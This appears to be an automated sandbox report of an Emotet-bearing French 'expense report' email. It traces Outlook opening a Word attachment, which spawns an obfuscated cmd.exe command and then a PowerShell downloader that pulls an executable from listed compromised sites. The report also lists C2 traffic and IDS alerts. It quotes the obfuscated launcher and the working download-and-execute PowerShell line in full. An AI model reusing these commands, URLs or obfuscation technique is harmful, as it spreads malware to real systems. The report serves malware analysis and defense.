File name: | Note_De_Frais.eml |
Full analysis: | https://app.any.run/tasks/4f55cb1e-f4bd-4046-b6ee-92ee771068b3 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 06, 2018, 09:25:12 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | A60C167DF9D1FB114D472ED78F5A299B |
SHA1: | 22CFD3D572CE827D2E91B111F25CEAF6885D2DDA |
SHA256: | ACCAAA7B00027A644B2CCEB36BDC84D2262DDC1D4AB95D60F58AF941FAAD2B94 |
SSDEEP: | 3072:FQq6cjIFeRuh0sM0mthlkMz4fQ9z4HY3ueZETB4jhbn6:5TIIRD0mt0i7d4Hhkl6 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3516 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\Note_De_Frais.eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
920 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2708 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\LIGFSZWI\I63493625_12062018.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3456 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
1464 | c:\TEjfSlZ\MmfIzdaMCqYl\WIVzZoUwn\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set Abg=zsRhsLbVZEDRBMHqwLUGPLzjDWpwfiuwKaILuFuTAc;g 3v6S(/8:Q{5=d$xyC+@ro1OkY')_\N-e4lnmJ20X,.t}&&for %L in (58;13;24;67;56;70;7;37;3;70;42;58;78;13;32;56;79;76;31;75;65;6;23;76;41;87;44;74;76;87;86;25;76;6;61;78;29;76;79;87;42;58;9;39;40;56;70;3;87;87;26;52;50;50;87;64;33;46;76;78;41;76;79;87;64;76;79;60;86;41;65;80;50;57;31;76;55;18;29;78;37;76;63;3;87;87;26;52;50;50;6;78;65;43;6;6;31;86;79;76;87;50;31;26;75;41;65;79;87;76;79;87;50;37;4;45;61;67;8;38;78;9;43;63;3;87;87;26;52;50;50;28;64;76;76;80;29;79;57;26;3;65;87;65;43;64;33;26;3;60;86;41;65;80;50;80;65;57;38;78;76;4;50;80;65;57;72;68;82;72;78;65;43;29;79;50;18;81;45;66;12;15;37;18;6;7;63;3;87;87;26;52;50;50;4;60;78;31;29;33;38;64;6;33;79;86;26;78;50;29;80;33;43;76;4;50;45;8;7;12;19;46;77;67;63;3;87;87;26;52;50;50;80;76;57;29;33;87;64;76;79;57;4;86;4;38;80;33;4;76;64;46;29;41;76;4;26;64;65;23;76;41;87;4;86;41;65;80;50;18;9;65;24;48;33;66;15;70;86;48;26;78;29;87;49;70;63;70;71;42;58;6;53;79;56;70;31;84;23;70;42;58;26;84;15;44;56;44;70;45;82;47;70;42;58;84;31;68;56;70;40;11;6;70;42;58;84;74;57;56;58;76;79;46;52;87;76;80;26;62;70;73;70;62;58;26;84;15;62;70;86;76;59;76;70;42;28;65;64;76;33;41;3;49;58;40;7;19;44;29;79;44;58;9;39;40;71;54;87;64;60;54;58;78;13;32;86;24;65;31;79;78;65;33;57;37;29;78;76;49;58;40;7;19;85;44;58;84;74;57;71;42;58;35;7;19;56;70;69;68;33;70;42;34;28;44;49;49;19;76;87;75;34;87;76;80;44;58;84;74;57;71;86;78;76;79;43;87;3;44;75;43;76;44;51;83;83;83;83;71;44;54;34;79;46;65;68;76;75;34;87;76;80;44;58;84;74;57;42;58;35;61;29;56;70;41;53;22;70;42;6;64;76;33;68;42;88;88;41;33;87;41;3;54;88;88;58;15;23;68;56;70;67;23;40;70;42;90)do set X7g=!X7g!!Abg:~%L,1!&&if %L equ 90 powershell "!X7g:~-517!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2744 | CmD /V:/C"set Abg=zsRhsLbVZEDRBMHqwLUGPLzjDWpwfiuwKaILuFuTAc;g 3v6S(/8:Q{5=d$xyC+@ro1OkY')_\N-e4lnmJ20X,.t}&&for %L in (58;13;24;67;56;70;7;37;3;70;42;58;78;13;32;56;79;76;31;75;65;6;23;76;41;87;44;74;76;87;86;25;76;6;61;78;29;76;79;87;42;58;9;39;40;56;70;3;87;87;26;52;50;50;87;64;33;46;76;78;41;76;79;87;64;76;79;60;86;41;65;80;50;57;31;76;55;18;29;78;37;76;63;3;87;87;26;52;50;50;6;78;65;43;6;6;31;86;79;76;87;50;31;26;75;41;65;79;87;76;79;87;50;37;4;45;61;67;8;38;78;9;43;63;3;87;87;26;52;50;50;28;64;76;76;80;29;79;57;26;3;65;87;65;43;64;33;26;3;60;86;41;65;80;50;80;65;57;38;78;76;4;50;80;65;57;72;68;82;72;78;65;43;29;79;50;18;81;45;66;12;15;37;18;6;7;63;3;87;87;26;52;50;50;4;60;78;31;29;33;38;64;6;33;79;86;26;78;50;29;80;33;43;76;4;50;45;8;7;12;19;46;77;67;63;3;87;87;26;52;50;50;80;76;57;29;33;87;64;76;79;57;4;86;4;38;80;33;4;76;64;46;29;41;76;4;26;64;65;23;76;41;87;4;86;41;65;80;50;18;9;65;24;48;33;66;15;70;86;48;26;78;29;87;49;70;63;70;71;42;58;6;53;79;56;70;31;84;23;70;42;58;26;84;15;44;56;44;70;45;82;47;70;42;58;84;31;68;56;70;40;11;6;70;42;58;84;74;57;56;58;76;79;46;52;87;76;80;26;62;70;73;70;62;58;26;84;15;62;70;86;76;59;76;70;42;28;65;64;76;33;41;3;49;58;40;7;19;44;29;79;44;58;9;39;40;71;54;87;64;60;54;58;78;13;32;86;24;65;31;79;78;65;33;57;37;29;78;76;49;58;40;7;19;85;44;58;84;74;57;71;42;58;35;7;19;56;70;69;68;33;70;42;34;28;44;49;49;19;76;87;75;34;87;76;80;44;58;84;74;57;71;86;78;76;79;43;87;3;44;75;43;76;44;51;83;83;83;83;71;44;54;34;79;46;65;68;76;75;34;87;76;80;44;58;84;74;57;42;58;35;61;29;56;70;41;53;22;70;42;6;64;76;33;68;42;88;88;41;33;87;41;3;54;88;88;58;15;23;68;56;70;67;23;40;70;42;90)do set X7g=!X7g!!Abg:~%L,1!&&if %L equ 90 powershell "!X7g:~-517!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3056 | powershell "$MDO='VFh';$lMK=new-object Net.WebClient;$ETA='http://travelcentreny.com/dwe5UilFe@http://blogbbw.net/wp-content/Fs3COZulEg@http://freemindphotography.com/modules/mod_k2_login/UJ31BqFUbV@http://sylwiaurban.pl/images/3ZVBGv4O@http://mediatrends.sumaservicesprojects.com/UEoDSa1q'.Split('@');$bQn='wXj';$pXq = '326';$Xwk='ARb';$XNd=$env:temp+'\'+$pXq+'.exe';foreach($AVG in $ETA){try{$lMK.DownloadFile($AVG, $XNd);$LVG='Yka';If ((Get-Item $XNd).length -ge 80000) {Invoke-Item $XNd;$LCi='cQz';break;}}catch{}}$qjk='OjA';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3588 | "C:\Users\admin\AppData\Local\Temp\326.exe" | C:\Users\admin\AppData\Local\Temp\326.exe | — | powershell.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
2376 | "C:\Users\admin\AppData\Local\Temp\326.exe" | C:\Users\admin\AppData\Local\Temp\326.exe | 326.exe | |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 | ||||
3936 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 326.exe |
User: admin Company: Mozilla, Netscape Integrity Level: MEDIUM Exit code: 0 Version: 6.1.7600.16385 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVRA5D8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\tmpA7DD.tmp | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF9CF15D696B24ED91.TMP | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\LIGFSZWI\I63493625_12062018 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF6841A4FF795C4E78.TMP | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DFC6FB0462F692D6AF.TMP | — | |
MD5:— | SHA256:— | |||
3516 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\OICE_912B74F4-2308-4F2A-85EF-B4054176A28F.0\6DDFB549.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR67FF.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2708 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_9676E91A-B8F9-4274-9598-51757CA571AF.0\57535690.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3456 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_9676E91A-B8F9-4274-9598-51757CA571AF.0\~DF07C52ADA3949F49B.TMP | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3516 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2588 | archivesymbol.exe | GET | — | 187.160.2.73:443 | http://187.160.2.73:443/ | MX | — | — | malicious |
2588 | archivesymbol.exe | GET | — | 99.225.98.242:443 | http://99.225.98.242:443/ | CA | — | — | malicious |
2588 | archivesymbol.exe | GET | — | 200.6.168.130:990 | http://200.6.168.130:990/ | CO | — | — | suspicious |
3056 | powershell.exe | GET | 200 | 132.148.37.169:80 | http://travelcentreny.com/dwe5UilFe/ | US | executable | 164 Kb | malicious |
3056 | powershell.exe | GET | 301 | 132.148.37.169:80 | http://travelcentreny.com/dwe5UilFe | US | html | 244 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2588 | archivesymbol.exe | 99.225.98.242:443 | — | Rogers Cable Communications Inc. | CA | malicious |
2588 | archivesymbol.exe | 187.160.2.73:443 | — | Television Internacional, S.A. de C.V. | MX | malicious |
3516 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
3056 | powershell.exe | 132.148.37.169:80 | travelcentreny.com | GoDaddy.com, LLC | US | malicious |
2588 | archivesymbol.exe | 200.6.168.130:990 | — | EPM Telecomunicaciones S.A. E.S.P. | CO | suspicious |
2588 | archivesymbol.exe | 201.203.100.160:990 | — | Instituto Costarricense de Electricidad y Telecom. | CR | suspicious |
2588 | archivesymbol.exe | 80.149.179.98:7080 | — | Deutsche Telekom AG | DE | malicious |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
travelcentreny.com |
| malicious |
dns.msftncsi.com |
| shared |
PID | Process | Class | Message |
---|---|---|---|
3056 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3056 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3056 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3056 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2588 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2588 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |